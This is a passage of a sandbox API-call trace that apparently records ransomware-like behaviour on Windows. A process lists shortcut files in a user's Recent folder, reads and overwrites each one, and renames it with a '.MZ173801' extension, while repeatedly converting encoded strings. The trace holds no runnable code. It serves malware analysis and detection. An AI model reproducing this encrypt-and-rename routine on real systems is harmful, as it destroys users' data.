lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.385] GetCurrentThreadId () returned 0x1358 [0110.385] GetCurrentThreadId () returned 0x1358 [0110.385] GetCurrentThreadId () returned 0x1358 [0110.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Pictures.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pictures.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.385] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.385] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.385] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2f1 [0110.385] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.385] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x2f1, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x2f1, lpOverlapped=0x0) returned 1 [0110.386] CloseHandle (hObject=0x3f4) returned 1 [0110.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Pictures.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pictures.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.387] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x2f1, lpOverlapped=0x0) returned 1 [0110.388] CloseHandle (hObject=0x3f4) returned 1 [0110.389] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Pictures.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pictures.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Pictures.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pictures.lnk.mz173801")) returned 1 [0110.389] GetCurrentThreadId () returned 0x1358 [0110.389] GetCurrentThreadId () returned 0x1358 [0110.389] GetCurrentThreadId () returned 0x1358 [0110.389] GetCurrentThreadId () returned 0x1358 [0110.389] GetCurrentThreadId () returned 0x1358 [0110.389] GetCurrentThreadId () returned 0x1358 [0110.389] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x760ed6ef, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x763aefec, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x763aefec, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x434, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="PlN2.lnk", cAlternateFileName="")) returned 1 [0110.389] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.389] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.389] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PlN2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pln2.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x760ed6ef, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x763aefec, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x763aefec, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x434)) returned 1 [0110.390] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.390] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.390] GetCurrentThreadId () returned 0x1358 [0110.390] GetCurrentThreadId () returned 0x1358 [0110.390] GetCurrentThreadId () returned 0x1358 [0110.391] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.391] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.391] GetCurrentThreadId () returned 0x1358 [0110.391] GetCurrentThreadId () returned 0x1358 [0110.391] GetCurrentThreadId () returned 0x1358 [0110.391] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PlN2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pln2.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.391] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.391] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.391] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x434 [0110.391] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.392] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x434, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x434, lpOverlapped=0x0) returned 1 [0110.392] CloseHandle (hObject=0x3f4) returned 1 [0110.392] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PlN2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pln2.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.393] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x434, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x434, lpOverlapped=0x0) returned 1 [0110.676] CloseHandle (hObject=0x3f4) returned 1 [0110.677] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PlN2.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pln2.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PlN2.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pln2.lnk.mz173801")) returned 1 [0110.678] GetCurrentThreadId () returned 0x1358 [0110.678] GetCurrentThreadId () returned 0x1358 [0110.678] GetCurrentThreadId () returned 0x1358 [0110.678] GetCurrentThreadId () returned 0x1358 [0110.678] GetCurrentThreadId () returned 0x1358 [0110.678] GetCurrentThreadId () returned 0x1358 [0110.678] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7575b8a4, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7575b8a4, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7575b8a4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x399, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="PuYC77t.lnk", cAlternateFileName="")) returned 1 [0110.678] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.678] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PuYC77t.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\puyc77t.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7575b8a4, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7575b8a4, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7575b8a4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x399)) returned 1 [0110.679] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.679] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 